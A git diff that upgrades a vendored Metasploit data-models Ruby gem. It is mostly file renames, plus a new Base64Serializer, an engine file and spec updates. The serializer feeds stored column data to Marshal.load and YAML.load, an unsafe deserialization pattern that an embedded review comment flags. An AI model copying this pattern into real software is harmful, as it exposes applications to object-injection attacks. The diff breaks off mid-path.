lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110717000001_add_profiles_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110717000001_add_profiles_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110727163801_expand_cred_ptype_column.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110727163801_expand_cred_ptype_column.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110730000001_add_initial_indexes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110730000001_add_initial_indexes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110812000001_prune_indexes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110812000001_prune_indexes.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110922000000_expand_notes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110922000000_expand_notes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110928101300_add_mod_ref_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110928101300_add_mod_ref_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111011110000_add_display_name_to_reports_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111011110000_add_display_name_to_reports_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111203000000_inet_columns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111203000000_inet_columns.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111204000000_more_inet_columns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111204000000_more_inet_columns.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111210000000_add_scope_to_hosts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111210000000_add_scope_to_hosts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120126110000_add_virtual_host_to_hosts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120126110000_add_virtual_host_to_hosts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120411173220_rename_workspace_members.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120411173220_rename_workspace_members.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120601152442_add_counter_caches_to_hosts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120601152442_add_counter_caches_to_hosts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000000_add_vuln_details.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000000_add_vuln_details.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000001_add_host_details.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000001_add_host_details.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000002_expand_details.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000002_expand_details.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000003_expand_details2.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000003_expand_details2.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000004_add_vuln_attempts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000004_add_vuln_attempts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000006_add_module_details.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000006_add_module_details.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000007_add_exploit_attempts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000007_add_exploit_attempts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000008_add_fail_message.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000008_add_fail_message.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm/host/operating_system_normalization.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm/host/operating_system_normalization.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm/host/operating_system_normalization.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm/host/operating_system_normalization.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/base64_serializer.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/base64_serializer.rb
new file mode 100755
index 0000000000..dfc0596b68
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/base64_serializer.rb
@@ -0,0 +1,103 @@
+# Provides ActiveRecord 3.1x-friendly serialization for descendants of
+# ActiveRecord::Base. Backwards compatible with older YAML methods and
+# will fall back to string decoding in the worst case
+#
+# @example Using default default of {}
+# serialize :foo, MetasploitDataModels::Base64Serializer.new
+#
+# @example Overriding default to []
+# serialize :bar, MetasploitDataModels::Base64Serializer.new(:default => [])
+#
+module MetasploitDataModels
+ class Base64Serializer
+ #
+ # CONSTANTS
+ #
+
+ # The default for {#default}
+ DEFAULT = {}
+ # Deserializers for {#load}
+ # 1. Base64 decoding and then unmarshalling the value.
+ # 2. Parsing the value as YAML.
+ # 3. The raw value.
+ LOADERS = [
+ lambda { |serialized|
+ marshaled = serialized.unpack('m').first
+ # Load the unpacked Marshal object first
+ Marshal.load(marshaled)
+ },
+ lambda { |serialized|
+ # Support legacy YAML encoding for existing data
+ YAML.load(serialized)
+ },
+ lambda { |serialized|
+ # Fall back to string decoding
+ serialized
+ }
+ ]
+
+ #
+ # Methods
+ #
+
+ # Creates a duplicate of default value
+ #
+ # @return
+ def default
+ @default.dup
+ end
+
+ attr_writer :default
+
+ # Serializes the value by marshalling the value and then base64 encodes the marshaled value.
+ #
+ # @param value [Object] value to serialize
+ # @return [String]
+ def dump(value)
+ # Always store data back in the Marshal format
+ marshalled = Marshal.dump(value)
+ base64_encoded = [ marshalled ].pack('m')
+
+ base64_encoded
+ end
+
+ # @param attributes [Hash] attributes
+ # @option attributes [Object] :default ({}) Value to use for {#default}.
+ def initialize(attributes={})
+ attributes.assert_valid_keys(:default)
+
+ @default = attributes.fetch(:default, DEFAULT)
+ end
+
+ # Deserializes the value by either
+ # 1. Base64 decoding and then unmarshalling the value.
+ # 2. Parsing the value as YAML.
+ # 3. Returns the raw value.
+ #
+ # @param value [String] serialized value
+ # @return [Object]
+ #
+ # @see #default
+ def load(value)
+ loaded = nil
+
+ if value.blank?
+ loaded = default
+ else
+ LOADERS.each do |loader|
+ begin
+ loaded = loader.call(value)
+ rescue
+ next
+ else
+ break
+ end
+ end
+ end
+
+ loaded
+ end
+ end
+end
+
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/engine.rb
new file mode 100644
index 0000000000..4f73f5c985
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/engine.rb
@@ -0,0 +1,14 @@
+require 'rails'
+
+module MetasploitDataModels
+ class Engine < Rails::Engine
+
+ # @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl
+ config.generators do |g|
+ g.assets false
+ g.fixture_replacement :factory_girl, :dir => 'spec/factories'
+ g.helper false
+ g.test_framework :rspec, :fixture => false
+ end
+ end
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/serialized_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/serialized_prefs.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/serialized_prefs.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/serialized_prefs.rb
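Review bot: `LOADERS` in the new base64_serializer.rb hands the stored column value to `Marshal.load` and, when that raises, to `YAML.load`; both can instantiate arbitrary Ruby objects, so anything able to write to a column using this serializer (imports, restored databases, other applications sharing the schema) is being treated as trusted input. That assumption should be stated above the constant, for example `# SECURITY: Marshal.load/YAML.load trust the column contents; use only on data this application wrote`, and the legacy YAML path limited to plain data types if the YAML library bundled with this Ruby offers a safe loader (to be confirmed for the version vendored here). The bare `rescue` in `load` also swallows every StandardError a loader raises, so a corrupt or unexpected value silently falls through to the raw-string loader and callers may receive a `String` where they expect the default's type; logging the fallback would make that visible. This file is a vendored copy of the gem, so the change belongs in metasploit_data_models itself.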
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/ip_format_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/ip_format_validator.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/ip_format_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/ip_format_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/password_is_strong_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/password_is_strong_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/version.rb similarity index 96% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/version.rb index ee7b61398b..6532b907d4 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/version.rb 
@@ -4,5 +4,5 @@ module MetasploitDataModels # metasploit-framework/data/sql/migrate to db/migrate in this project, not all models have specs that verify the # migrations (with have_db_column and have_db_index) and certain models may not be shared between metasploit-framework # and pro, so models may be removed in the future. Because of the unstable API the version should remain below 1.0.0 - VERSION = '0.5.1' + VERSION = '0.6.0' end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/tasks/yard.rake similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/tasks/yard.rake diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/metasploit_data_models.gemspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/metasploit_data_models.gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/script/rails 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/app/models/mdm/web_vuln_spec.rb similarity index 80% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/app/models/mdm/web_vuln_spec.rb index d55706f947..904a19fe0b 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/app/models/mdm/web_vuln_spec.rb @@ -5,6 +5,10 @@ describe Mdm::WebVuln do 1 .. 100 end + let(:default_params) do + [] + end + let(:methods) do [ 'GET', @@ -18,6 +22,10 @@ describe Mdm::WebVuln do 0 .. 5 end + subject(:web_vuln) do + described_class.new + end + context 'associations' do it { should belong_to(:web_site).class_name('Mdm::WebSite') } end @@ -74,7 +82,11 @@ describe Mdm::WebVuln do it { should ensure_inclusion_of(:method).in_array(methods) } it { should validate_presence_of :name } it { should validate_presence_of :path } - it { should validate_presence_of :params } + + it 'should not validate presence of params because it default to [] and can never be nil' do + web_vuln.should_not validate_presence_of(:params) + end + it { should validate_presence_of :pname } it { should validate_presence_of :proof } it { should ensure_inclusion_of(:risk).in_range(risk_range) } 
@@ -84,4 +96,31 @@ describe Mdm::WebVuln do context 'serializations' do it { should serialize(:params).as_instance_of(MetasploitDataModels::Base64Serializer) } end + + context '#params' do + let(:default) do + [] + end + + let(:params) do + web_vuln.params + end + + it 'should default to []' do + params.should == default + end + + it 'should return default if set to nil' do + web_vuln.params = nil + web_vuln.params.should == default + end + + it 'should return default if set to nil and saved' do + web_vuln = FactoryGirl.build(:mdm_web_vuln) + web_vuln.params = nil + web_vuln.save! + + web_vuln.params.should == default + end + end end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/Rakefile similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/Rakefile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/Rakefile diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/javascripts/application.js b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/javascripts/application.js similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/javascripts/application.js rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/javascripts/application.js 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/stylesheets/application.css b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/stylesheets/application.css similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/stylesheets/application.css rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/stylesheets/application.css diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/controllers/application_controller.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/controllers/application_controller.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/controllers/application_controller.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/controllers/application_controller.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/helpers/application_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/helpers/application_helper.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/helpers/application_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/helpers/application_helper.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/mailers/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/mailers/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/mailers/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/mailers/.gitkeep 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/models/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/models/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/models/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/models/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/views/layouts/application.html.erb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/views/layouts/application.html.erb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/views/layouts/application.html.erb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/views/layouts/application.html.erb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config.ru b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config.ru similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config.ru rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config.ru diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/application.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/application.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/application.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/application.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/boot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/boot.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/boot.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/boot.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/database.yml.example b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/database.yml.example similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/database.yml.example rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/database.yml.example diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environment.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environment.rb rename to 